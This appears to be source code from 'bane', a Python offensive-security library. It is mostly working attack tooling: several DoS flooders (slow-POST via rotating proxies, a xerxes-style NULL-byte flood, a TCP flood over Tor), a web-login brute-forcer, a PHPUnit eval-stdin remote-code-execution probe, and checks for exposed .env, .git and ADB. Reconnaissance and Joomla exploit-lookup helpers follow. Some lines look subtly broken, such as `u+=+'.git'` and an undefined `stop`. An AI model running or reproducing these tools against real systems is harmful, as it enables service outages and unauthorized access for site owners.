                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        try:
            time.sleep(1)
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    bot_type = []
                    if len(self.httplist) > 0:
                        bot_type.append("h")
                    if len(self.socks4list) > 0:
                        bot_type.append("s4")
                    if len(self.socks5list) > 0:
                        bot_type.append("s5")
                    z = random.choice(bot_type)
                    if z == "h":
                        line = random.choice(self.httplist)
                    elif z == "s4":
                        line = random.choice(self.socks4list)
                    elif z == "s5":
                        line = random.choice(self.socks5list)
                    ipp = line.split(":")[0].split("=")[0]
                    pp = line.split(":")[1].split("=")[0]
                    s = socks.socksocket()
                    if z == "h":
                        s.setproxy(socks.PROXY_TYPE_HTTP, str(ipp), int(pp), True)
                    elif z == "s4":
                        s.setproxy(socks.PROXY_TYPE_SOCKS4, str(ipp), int(pp), True)
                    elif z == "s5":
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, str(ipp), int(pp), True)
                    if z == "h":
                        s.settimeout(self.timeout)
                    s.connect((self.target, self.port))
                    self.counter += 1
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
                    q = random.randint(self.min_content, self.max_content)
                    ck = ""
                    if self.cookie:
                        ck = "Cookie: " + self.cookie + "\r\n"
                    s.send(
                        reorder_headers_randomly(
                            "POST {} HTTP/1.1\r\n{}User-Agent: {}\r\nAccept-language: en-US,en,q=0.5\r\nConnection: keep-alive\r\nKeep-Alive: {}\r\nContent-Length: {}\r\nContent-Type: application/x-www-form-urlencoded\r\nReferer: {}\r\nHost: {}\r\n\r\n".format(
                                random.choice(paths),
                                ck,
                                random.choice(self.user_agents),
                                random.randint(300, 1000),
                                q,
                                (
                                    random.choice(referers)
                                    + random.choice(lis)
                                    + str(random.randint(0, 100000000))
                                    + random.choice(lis)
                                ),
                                self.target,
                            )
                        ).encode("utf-8")
                    )
                    for i in range(q):
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        if self.stop == True:
                            break
                        h = random.choice(lis)
                        try:
                            s.send(h.encode("utf-8"))
                            if self.logs == True:
                                sys.stdout.write("\rPosted: {} --> {}".format(h, ipp))
                                sys.stdout.flush()
                                # print("Posted: {} --> {}".format(h,ipp))
                            time.sleep(random.uniform(0.1, 3))
                        except:
                            break
                    s.close()
                except:
                    pass
                self.counter -= 1
                time.sleep(0.1)
            self.kill()
        except:
            pass



from bane.bruteforce.utils import *



class web_login_bruteforce:
    __slots__ = ["stop", "finish", "result", "logs"]

    def try_combo(self, url, username, password, cookie, user_agent, proxy, timeout,headers):
        prox = None
        cookies = None
        h = {"User-Agent": user_agent}
        if cookie:
            h.update({"Cookie": cookie})
            cookies = cookie
        h.update(headers)
        try:
            r = requests.get(
                url, proxies=proxy, headers=h, verify=False, timeout=timeout
            )
        except:
            return False
        cook = None
        try:
            cook = r.headers["Set-cookie"]
        except:
            pass
        cookies = set_correct_cookies(cook, cookie=cookie)
        form = set_login_form(url, r.text, username, password)
        h = {"User-Agent": user_agent}
        if cookies:
            h.update({"Cookie": cookies})
        d = form[0]
        h.update(
            {
                "Referer": form[1],
                "Origin": form[1].split("://")[0]
                + "://"
                + form[1].split("://")[1].split("/")[0],
            }
        )
        try:
            r = requests.post(
                form[1], data=d, headers=h, verify=False, proxies=proxy, timeout=timeout
            )
        except:
            return False
        try:
            set_login_form(url, r.text, username, password)
            return False
        except:
            return True

    def __init__(
        self,
        u,
        word_list=[],
        threads_daemon=True,
        logs=True,
        proxy=None,
        proxies=None,
        cookie=None,
        user_agent=None,
        timeout=10,
        headers={}
    ):
        self.stop = False
        self.finish = False
        self.logs = logs
        self.result = {}
        t = threading.Thread(
            target=self.crack,
            args=(
                u,
                word_list,
                logs,
                proxy,
                proxies,
                cookie,
                user_agent,
                timeout,
                headers,
            ),
        )
        t.daemon = threads_daemon
        t.start()

    def done(self):
        return self.finish

    def crack(self, u, word_list, logs, proxy, proxies, cookie, user_agent, timeout,headers):
        for x in word_list:
            try:
                if self.stop == True:
                    self.finish = True
                    break
                username = x.split(":")[0]
                password = x.split(":")[1]
                if self.logs == True:
                    print("[*]Trying: {} {}".format(username, password))
                if user_agent:
                    us = user_agent
                else:
                    us = random.choice(ua)
                prox = None
                if proxy:
                    prox = proxy
                if proxies:
                    prox = random.choice(proxies)
                if (
                    self.try_combo(u, username, password, cookie, us, prox, timeout,headers)
                    == True
                ):
                    if self.logs == True:
                        print("[+]Success")
                    self.result = {u: username + ":" + password}
                    self.finish = True
                    break
                else:
                    if self.logs == True:
                        print("[-]Fail")
            except Exception as e:
                pass
                if self.logs == True:
                    print("[-]Fail")
        self.finish = True




from bane.scanners.vulnerabilities.utils import *

def exposed_env(
    u,
    user_agent=None,
    cookie=None,
    proxies=None,
    proxy=None,
    path="",
    brute_force=True,
    timeout=15,
    headers={}
):
    if brute_force == False:
        if user_agent:
            us = user_agent
        else:
            us = random.choice(ua)
        if cookie:
            hea = {"User-Agent": us, "Cookie": cookie}
        else:
            hea = {"User-Agent": us}
        hea.update(headers)
        try:
            if urlparse(u).path == "/":
                u += path + ".env"
            elif len(urlparse(u).path) < 1:
                u += path + "/.env"
            else:
                u = u.replace(urlparse(u).path, path + "/.env")
            c = requests.get(
                u, headers=hea, proxies=proxy, timeout=timeout, verify=False
            ).text
            if ("APP_KEY=" in c) or ("DB_HOST=" in c):
                return (True, u)
        except:
            pass
        return (False, "")
    else:
        for x in env_paths:
            if proxy:
                proxy = proxy
            if proxies:
                proxy = random.choice(proxies)
            a = exposed_env(
                u,
                user_agent=user_agent,
                cookie=cookie,
                proxy=proxy,
                path=x,
                timeout=timeout,
                headers=headers
            )
            if a[0] == True:
                return a
        return (False, "")




from bane.scanners.vulnerabilities.utils import *


def adb_exploit(u, timeout=5, p=5555,proxy_host=None,proxy_port=None,proxy_username=None,proxy_password=None,proxy_type=None):
    if proxy_type=='http':
        proxy_type=socks.PROXY_TYPE_HTTP
    if proxy_type=='socks4':
        proxy_type=socks.PROXY_TYPE_SOCKS4
    if proxy_type=='socks5':
        proxy_type=socks.PROXY_TYPE_SOCKS5
    try:
        s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
        if proxy_type!=None:
            s.setproxy( 
                    proxy_type=proxy_type,
                    addr=proxy_host,
                    port=proxy_port,
                    username=proxy_username,
                    password=proxy_password,
            )
        s.settimeout(timeout)
        s.connect((u, p))
        s.send(
            b"CNXN\x00\x00\x00\x01\x00\x10\x00\x00\x07\x00\x00\x00\x32\x02\x00\x00\xbc\xb1\xa7\xb1host::\x00"
        )
        c = s.recv(4096)
        s.close()
        if "CNXN" in str(c):
            return True
    except:
        pass
    return False




from bane.ddos.utils import *

class xerxes(DDoS_Class):
    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        threads=500,
        timeout=5,
        duration=60,
        logs=False,
        tor=False,
    ):
        self.counter = 0
        self.target = u
        self.port = p
        self.stop = False
        self.duration = duration
        self.timeout = timeout
        self.tor = tor
        self.start = time.time()
        self.logs = logs
        self.id_key = 0
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
                self.id_key += 1
            except:
                pass

    def attack(self):
        try:
            x = self.id_key
            time.sleep(1)
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        s.settimeout(self.timeout)
                    if self.tor == True:
                        s.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True)
                    s.connect((self.target, self.port))
                    self.counter += 1
                    """if self.logs==True:
     #print("[Connected to {}:{}]".format(self.target,self.port))
     sys.stdout.write("\r[Connected to {}:{}]".format(self.target,self.port))
     sys.stdout.flush()"""
                    while True:
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        if self.stop == True:
                            break
                        try:
                            s.send("\x00".encode("utf-8"))  # send NULL character
                            if self.logs == True:
                                sys.stdout.write("\r[{}: Voly sent]    ".format(x))
                                sys.stdout.flush()
                        except:
                            break
                        time.sleep(0.2)
                except:
                    pass
                self.counter -= 1
                time.sleep(0.3)
            self.kill()
        except:
            pass



from bane.scanners.vulnerabilities.utils import *

def page_clickjacking(u, proxy=None, timeout=10, user_agent=None, cookie=None, logs=False,request_headers=None,headers={}):
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    if cookie:
        heads = {"User-Agent": us, "Cookie": cookie}
    else:
        heads = {"User-Agent": us}
    heads.update(headers)
    try:
        if request_headers==None:
            r = requests.get(
                u, headers=heads, proxies=proxy, timeout=timeout, verify=False
            ).headers
        else:
            r=request_headers
        click = True
        for x in r:
            if x.lower().strip() == "x-frame-options":
                click = False
            if logs == True:
                print(x + " : " + r[x])
    except:
        return False
    return click





from bane.gather_info.utils import *


def whois(u):
    try:
        r = requests.post("https://check-host.net/ip-info/whois", data={"host": u})
        a = r.text.split("\n\n")[0]
        b = a.split("\n")
        d = {}
        for x in b:
            d.update(
                {
                    x.split(":")[0]
                    .strip(): x.replace(x.split(":")[0].strip(), "")
                    .strip()[1:]
                    .strip()
                }
            )
        return d
    except:
        pass
    return {}


def info(u, timeout=10, proxy=None, logs=False, returning=True):
    """
    this function fetchs all informations about the given ip or domain using check-host.net and returns them to the use as string
    with this format:
    'requested information: result'

    it takes 2 arguments:

    u: ip or domain
    timeout: (set by default to: 10) timeout flag for the request
    usage:
    >>>import bane
    >>>domain='www.google.com'
    >>>bane.info(domain)"""
    try:
        h = ""
        u = "https://check-host.net/ip-info?host=" + u
        c = requests.get(
            u, headers={"User-Agent": random.choice(ua)}, proxies=proxy, timeout=timeout
        ).text
        soup = BeautifulSoup(c, "html.parser")
        la = soup.find_all("a")
        l = []
        for i in la:
            if "#ip_info-dbip" in str(i):
                l.append(remove_html_tags(str(i)).strip().replace("\n", " "))
            if "#ip_info-ip2location" in str(i):
                l.append(remove_html_tags(str(i)).strip().replace("\n", " "))
            if "#ip_info-geolite2" in str(i):
                l.append(remove_html_tags(str(i)).strip().replace("\n", " "))
        p = soup.find_all("table")
        o = 0
        di = {}
        for x in p:
            try:
                do = {}
                y = x.find_all("tr")
                for w in y:
                    a = w.find_all("td")
                    try:
                        c = str(a[0]).split("<td>")[1].split("</td>")[0].strip()
                        d = str(a[1]).split("<td>")[1].split("</td>")[0].strip()
                        d = remove_html_tags(d).strip().replace("\n", " ")
                        do.update({c: d})
                    except:
                        pass
                di.update({l[o]: do})
                o += 1
            except:
                pass
        if logs == True:
            for x in di:
                print(x)
                print("")
                for y in di[x]:
                    print(y + ": " + di[x][y])
                print("")
        if returning == True:
            return di
    except:
        return None


def resolve(u, server="8.8.8.8", timeout=1, lifetime=1):
    o = []
    r = dns.resolver.Resolver()
    r.timeout = timeout
    r.lifetime = lifetime
    r.nameservers = [server]
    a = r.query(u)
    for x in a:
        o.append(str(x))
    return o




from bane.ddos.utils import *

class tcp_flood(DDoS_Class):
    def __init__(
        self,
        u,
        p=80,
        threads_daemon=True,
        min_size=10,
        max_size=50,
        threads=256,
        timeout=5,
        round_min=1000,
        round_max=10000,
        interval=0.001,
        duration=60,
        logs=False,
        tor=False,
    ):
        self.logs = logs
        self.stop = False
        self.counter = 0
        self.start = time.time()
        self.target = u
        self.duration = duration
        self.port = p
        self.timeout = timeout
        self.tor = tor
        self.min_size = min_size
        self.max_size = max_size
        self.interval = interval
        self.round_min = round_min
        self.round_max = round_max
        for x in range(threads):
            try:
                t = threading.Thread(target=self.attack)
                t.daemon = threads_daemon
                t.start()
            except:
                pass

    def attack(self):
        try:
            time.sleep(1)  # give time for all threads to be created
            while True:
                if (
                    int(time.time() - self.start) >= self.duration
                ):  # this is a safety mechanism so the attack won't run forever
                    break
                if self.stop == True:
                    break
                try:
                    s = socks.socksocket(socket.AF_INET, socket.SOCK_STREAM)
                    if self.tor == False:
                        s.settimeout = (
                            self.timeout
                        )  # we can't set timeout with socks module if we are going to use a socks proxy
                    if self.tor == True:
                        s.setproxy(
                            socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050, True
                        )  # let the traffic go through tor
                    s.connect((self.target, self.port))  # connect to target
                    if (self.port == 443) or (self.port == 8443):
                        s = ssl.wrap_socket(
                            s, ssl_version=ssl.PROTOCOL_TLSv1
                        )  # use ssl if needed on specific ports
                    for l in range(
                        random.randint(self.round_min, self.round_max)
                    ):  # send packets with random number of times for each connection (number between "round_min" and "round_max")
                        if (
                            int(time.time() - self.start) >= self.duration
                        ):  # this is a safety mechanism so the attack won't run forever
                            break
                        if stop == True:
                            break
                        m = ""
                        for li in range(
                            random.randint(self.min_size, self.max_size)
                        ):  # each payload' size is chosen randomly between maximum and minimum values
                            m += random.choice(lis)
                        try:
                            if stop == True:
                                break
                            s.send(m.encode("utf-8"))
                            self.counter += 1
                            if self.logs == True:
                                sys.stdout.write(
                                    "\rPackets: {} | Bytes: {}   ".format(
                                        self.counter, len(m)
                                    )
                                )
                                sys.stdout.flush()
                                # print("Packets: {} | Bytes: {}".format(tcp_counter,len(m)))
                            time.sleep(self.interval)
                        except:
                            break
                        time.sleep(self.interval)
                    s.close()
                except:
                    pass
                time.sleep(0.1)
            self.kill()
        except:
            pass





from bane.gather_info.utils import *
from bane.gather_info.domains import resolve

def subdomains_crt(domain,dns_server='8.8.8.8',resolve_timeout=2,resolve_lifetime=1,logs=True,subdomain_check_timeout=10, crt_timeout=120,cookie=None, user_agent=None, proxy=None,subdomains_only=False):
    domain=extract_root_domain(domain)
    if logs==True:
        print()
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    if "://" in domain:
        domain = domain.split("://")[1].split("/")[0]
    if "www." in domain:
        domain = domain.replace("www.", "")
    if logs==True:
        print('[*] searching with crt.sh ...\n')
    try:
        r = requests.get(
            "https://crt.sh/?output=json&q=%25." + domain,
            headers=hed,
            proxies=proxy,
            timeout=crt_timeout,
            verify=False,
        ).json()
        #print(r)
        a = [x["name_value"].split("\\")[0] for x in r if ("*." not in x["name_value"])]
        l = []
        for x in a:
            if "\n" in x:
                l += x.split("\n")
            else:
                l.append(x)
        l= list(dict.fromkeys(l))
        result={}
        for x in l:
            if extract_root_domain(x)==domain:
                try:
                    r=requests.get('http://'+x,headers=hed,proxies=proxy,timeout=subdomain_check_timeout,verify=False)
                    if extract_root_domain(r.url.split('://')[1].split('/')[0])==extract_root_domain(x):
                        result.update({x:r.url})
                        if logs==True:
                            print('\t[+] {}'.format(x))
                except:
                    try:
                        result.update({x:resolve(x,server=dns_server,timeout=resolve_timeout,lifetime=resolve_lifetime)})
                    except:
                        pass
        if logs==True:
            print()
        if subdomains_only==True:
            return list(result.keys())
        return result

    except Exception as ex:
        #print(ex)
        if subdomains_only==True:
            return {}
        return []

"""
def subdomains_finder(
    u, process_check_interval=5, logs=True, requests_timeout=15, https=False,proxy=None
):
    https_flag = 0
    if (https == True) or ("https://" in u):
        https_flag = 1
    if "://" in u:
        host = u.split("://")[1].split("/")[0]
    else:
        host = u
    sd = []
    while True:
        try:
            s = requests.session()
            r = s.post(
                "https://scan.penteston.com/scan_system.php",
                data={
                    "scan_method": "S201",
                    "test_protocol": https_flag,
                    "test_host": host,
                },
                timeout=requests_timeout,
                proxies=proxy
            ).text
            if '"isFinished":"no"' not in r:
                if logs == True:
                    print("\n[+]Scan results:")
                c = r.split("strong><br\/>")[1].replace('"}', "")
                for x in c.split("<br\/>"):
                    if logs == True:
                        print(x)
                    sd.append(x)
                break
            else:
                if logs == True:
                    sys.stdout.write("\r[*]Scan in progress...")
                    sys.stdout.flush()
                # print("[*]Scan in progress...")
        except KeyboardInterrupt:
            break
        except:
            pass
        try:
            time.sleep(process_check_interval)
        except KeyboardInterrupt:
            break
        except:
            pass
    return {u: sd}

"""

def get_subdomains_from_wayback(domain,dns_server='8.8.8.8',resolve_timeout=2,resolve_lifetime=1,logs=True,user_agent=None,cookie=None,wayback_timeout=50,subdomain_check_timeout=10,max_urls=10,subdomains_only=False,proxy=None):
    domain=extract_root_domain(domain)
    if logs==True:
        print()
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    subdomains = set()
    urls={}
    invalid_subd=[]
    if logs==True:
        print('[*] searching with wayback machine ...\n')
    url = "https://web.archive.org/cdx/search/cdx?url=*.{}/*&output=json&fl=original&collapse=urlkey".format(domain)
    response = requests.get(url,headers=hed,timeout=wayback_timeout,proxies=proxy)
    if response.status_code == 200:
        data = response.json()
        for entry in data:
            original_url = entry[0]
            match = re.match(r"https?://([^/]*)", original_url.split('?')[0])
            if match:
                subdomain = match.group(1)
                if subdomain not in invalid_subd and extract_root_domain(subdomain)==domain:
                    if subdomain not in urls:
                        try:
                            r=requests.get(original_url,headers=hed,timeout=subdomain_check_timeout,proxies=proxy)
                            if extract_root_domain(r.url.split('://')[1].split('/')[0])==extract_root_domain(subdomain):
                                urls[subdomain]=set()
                                urls[subdomain].add(original_url)
                                if logs==True:
                                    print('\t[+] {}'.format(subdomain))
                        #if len(urls[subdomain])<5:
                        except KeyboardInterrupt:
                            break
                        except:
                            try:
                                urls[subdomain].add(resolve(x.split(':')[0],server=dns_server,timeout=resolve_timeout,lifetime=resolve_lifetime))
                                if logs==True:
                                    print('\t[+] {}'.format(subdomain))
                            except:
                                invalid_subd.append(subdomain)
                    else:
                        if len(urls[subdomain])<max_urls:
                            urls[subdomain].add(original_url)
                        subdomains.add(subdomain)
    else:
        raise("Error fetching data from Wayback Machine")
    if logs==True:
        print()
    if subdomains_only==True:
        return list(urls.keys())
    for x in urls:
        urls[x]=list(urls[x])
    return urls




def get_subdomains(domain,dns_server='8.8.8.8',resolve_timeout=2,resolve_lifetime=1,logs=True, crt_timeout=120,user_agent=None,cookie=None,wayback_timeout=120,subdomain_check_timeout=10,max_wayback_urls=10,proxy=None,subdomains_only=False):
    domain=extract_root_domain(domain)
    subs=get_subdomains_from_wayback(domain,dns_server=dns_server,resolve_timeout=resolve_timeout,resolve_lifetime=resolve_lifetime,logs=logs,cookie=cookie,wayback_timeout=wayback_timeout,user_agent=user_agent,subdomain_check_timeout=subdomain_check_timeout,max_urls=max_wayback_urls,subdomains_only=subdomains_only,proxy=proxy)
    l=subdomains_crt(domain,dns_server=dns_server,resolve_timeout=resolve_timeout,resolve_lifetime=resolve_lifetime,logs=logs,subdomain_check_timeout=subdomain_check_timeout, crt_timeout=crt_timeout,cookie=cookie, user_agent=user_agent, proxy=proxy,subdomains_only=subdomains_only)
    if type(subs)==list:
        for x in l:
            if x not in subs:
                subs.append(x)
        return subs
    for x in l:
        if x not in subs:
            subs.update({x:l[x]})
        else:
            if l[x] not in subs[x]:
                subs[x].append(l[x])
    return subs


import subprocess, os, xtelnet, sys, cgi, re, json
from colorama import Fore, Back, Style

if sys.version_info < (3, 0):
    if (sys.platform.lower() == "win32") or (sys.platform.lower() == "win64"):
        Fore.WHITE = ""
        Fore.GREEN = ""
        Fore.RED = ""
        Fore.YELLOW = ""
        Fore.BLUE = ""
        Fore.MAGENTA = ""
        Style.RESET_ALL = ""
    import urllib, HTMLParser
    from urlparse import urlparse
    from urllib import unquote as url_decode
else:
    from urllib.parse import urlparse
    from urllib.parse import unquote as url_decode
    import urllib.parse as urllib
    import html.parser as HTMLParser

unicode = str
import requests, socket, random, time, ssl
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import bs4,socks
from bs4 import BeautifulSoup
from bane.common.payloads import *
from bane.utils.pager import *
from bane.utils.js_fuck import js_fuck
from bane.utils.handle_files import write_file, delete_file
from bane.gather_info.info_s import extract_root_domain


def random_string(size):
    s = ""
    for x in range(size):
        s += random.choice(lis)
    return s


def setup_to_submit(form):
    d = {}
    f = {}
    for x in form["inputs"]:
        if x["type"] == "file":
            f.update({x["name"]: x["value"]})
        else:
            d.update({x["name"]: x["value"]})
    return d, f


def setup_proxy(pr, prs):
    if pr:
        return pr
    if prs:
        return random.choice(prs)
    return None


def setup_ua(usra):
    if usra:
        return usra
    return random.choice(ua)


def valid_parameter(parm):
    try:
        float(parm)
        return False
    except:
        return True




from bane.scanners.vulnerabilities.utils import *

def phpunit_exploit(
    u,
    path="/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    user_agent=None,
    cookie=None,
    timeout=10,
    proxy=None,
    headers={}
):
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    try:
        r = requests.post(
            u + path,
            data="<?php echo 'This_is_vulnerable_site';?>",
            headers=hed,
            proxies=proxy,
            timeout=timeout,
            verify=False,
        ).text
        if "This_is_vulnerable_site" in r:
            return True
    except:
        pass
    return False




from bane.scanners.vulnerabilities.utils import *


def exposed_git(
    u,
    user_agent=None,
    cookie=None,
    proxy=None,
    timeout=15,
    headers={}
):
    if u.endswith('/')==True:
        u+=+'.git'
    else:
        u+=+'/.git'
    if user_agent:
            us = user_agent
    else:
            us = random.choice(ua)
    if cookie:
            hea = {"User-Agent": us, "Cookie": cookie}
    else:
            hea = {"User-Agent": us}
    hea.update(headers)
    try:
        r=requests.get(u,timeout=timeout,verify=False,proxies=proxy,headers=hea)
        if "index of" in r.text.lower() and "/.git" in r.text.lower():
            return True
    except:
        return False




def caesar_string(w, k):
    if (type(k) is not int) or (k not in range(1, 27)):
        raise Exception("the key must be an integer between: 1 and 26")
    if (not w) or (len(w) == 0):
        raise Exception("You must provide data")
    a = "abcdefghijklmnopqrstuvwxyz"
    b = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    c = ""
    for i in w:
        """if (k>26) or (k<1) or (ord(i) not in range(32,127)):
        break"""
        if i in a:
            c += a[(a.index(i) + k) % 26]
        elif i in b:
            c += b[(b.index(i) + k) % 26]
        else:
            c += i
    return c


"""
  function to do simple caesar decryption lol.
  
  it takes 2 arguments:

  the first one is the string to decrypt and the second is the second is the decryption key (integer between: 1 and 26)

  example:

  >>> bane.dcaesar('fqf',5)
  'ala'
"""


def dcaesar(w, k):
    if (type(k) is not int) or (k not in range(1, 27)):
        raise Exception("the key must be an integer between: 1 and 26")
    if (not w) or (len(w) == 0):
        raise Exception("You must provide data")
    a = "abcdefghijklmnopqrstuvwxyz"
    b = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    c = ""
    for i in w:
        """if (k>26) or (k<1) or (ord(i) not in range(32,128)):
        break"""
        if i in a:
            c += a[(a.index(i) - k) % 26]
        elif i in b:
            c += b[(b.index(i) - k) % 26]
        else:
            c += i
    return c



from bane.scanners.cms.utils import *

def get_joomla_infos(u,user_agent=None,cookie=None,timeout=10,proxy=None,logs=True,crt_timeout=120,wayback_timeout=120,subdomain_check_timeout=10,max_wayback_urls=10,subdomains_only=True,headers={}):
    domain=u.split('://')[1].split('/')[0].split(':')[0]
    root_domain=extract_root_domain(domain)
    ip=socket.gethostbyname(domain.split(':')[0])
    if u[len(u) - 1] == "/":
        u = u[0 : len(u) - 1]
    if user_agent:
        us = user_agent
    else:
        us = random.choice(ua)
    hed = {"User-Agent": us}
    if cookie:
        hed.update({"Cookie": cookie})
    hed.update(headers)
    try:
        response = requests.get(u+"/language/en-GB/en-GB.xml", headers=hed, proxies=proxy, timeout=timeout, verify=False)
        version= response.text.split('<version>')[1].split('</version>')[0].strip()
    except:
        version= ''
    try:
        response = requests.get(u, headers=hed, proxies=proxy, timeout=timeout, verify=False)
    except:
        pass
    server=response.headers.get('Server','')
    try:
        server_os=[x for x in server.split() if x.startswith('(')==True][0].replace('(','').replace(')','')
    except:
        server_os=''
    backend=response.headers.get('X-Powered-By','')
    if logs==True:
        print("Joomla site info:\n\n\tURL: {}\n\tDomain: {}\n\tIP: {}\n\tServer: {}\n\tOS: {}\n\tBackend technology: {}\n\tJoomla version: {}\n".format(u,domain,ip,server,server_os,backend,version))
    clickj=page_clickjacking(u,request_headers=response.headers)
    if logs==True:
        print("[i] Looking for subdomains...")
    subs=get_subdomains(root_domain,logs=logs, crt_timeout=crt_timeout,user_agent=user_agent,cookie=cookie,wayback_timeout=wayback_timeout,subdomain_check_timeout=subdomain_check_timeout,max_wayback_urls=max_wayback_urls,proxy=proxy,subdomains_only=subdomains_only)
    if logs==True:
        print("[i] Cheking if we can sniff some cookies over some links...")
        print()
    media_non_ssl=sniffable_links(u,content=response.text,logs=logs,request_headers=response.headers)
    if logs==True:
        print()
    wp_vulns=[]
    if version!='':
        if logs==True:
            print('[i] looking for exploits for version: {}\n'.format(version))
        wpvulns=vulners_search('joomla',version=version,proxy=proxy)
        for x in wpvulns:
            if 'joomla' in x['title'].lower() or 'joomla' in x['description'].lower():
                wp_vulns.append(x)
        for x in wp_vulns:
            for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                try:
                    del x[i]
                except:
                    pass
        if logs==True:
            if len(wp_vulns)==0:
                print('\t[-] none was found')
            else:
                for x in wp_vulns:
                    print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                    print()
    backend_technology_exploits={}
    if backend!='':
        bk=[]
        for back in backend.split():
            if logs==True:
                print('[i] looking for exploits for : {}\n'.format(back))
            if '/' not in back:
                if logs==True:
                    print('\t[-] unknown version\n')
            else:
                bk=vulners_search(back.split('/')[0].lower(),version=back.split('/')[1],proxy=proxy)
            for x in bk:
                for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                    try:
                        del x[i]
                    except:
                        pass
            backend_technology_exploits.update({back:bk})
            if logs==True:
                if len(bk)==0:
                    print('\t[-] none was found')
                else:
                    for x in bk:
                        print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                        print()
    server_exploits={}
    if server!='':
        for sv in server.split():
            if sv.startswith('(')==False:
                sv_e=[]
                if logs==True:
                    print('[i] looking for exploits for : {}\n'.format(sv))
                if '/' in sv:
                    sv_e=vulners_search(sv.split('/')[0].lower(),version=sv.split('/')[1],proxy=proxy)
                else:
                    if logs==True:
                        print('\t[-] unknown version\n')
                for x in sv_e:
                    for i in ['cpe', 'cpe23', 'cwe', 'affectedSoftware']:
                        try:
                            del x[i]
                        except:
                            pass
                server_exploits.update({sv:sv_e})
                if logs==True:
                    if len(sv_e)==0:
                        print('\t[-] none was found')
                    else:
                        for x in sv_e:
                            print("\tTitle : {}\n\tDescription: {}\n\tLink: {}".format(x['title'],x['description'],x['href']))
                            print()
    return {'url':u,'domain':domain,'ip':ip,'root_domain':root_domain,'sub_domains':subs,'server':server,'os':server_os,'backend_technology':backend,'joomla_version':version,'sniffable_links':media_non_ssl,'clickjackable':clickj,"exploits":wp_vulns,'backend_technology_exploits':backend_technology_exploits,'server_exploits':server_exploits}
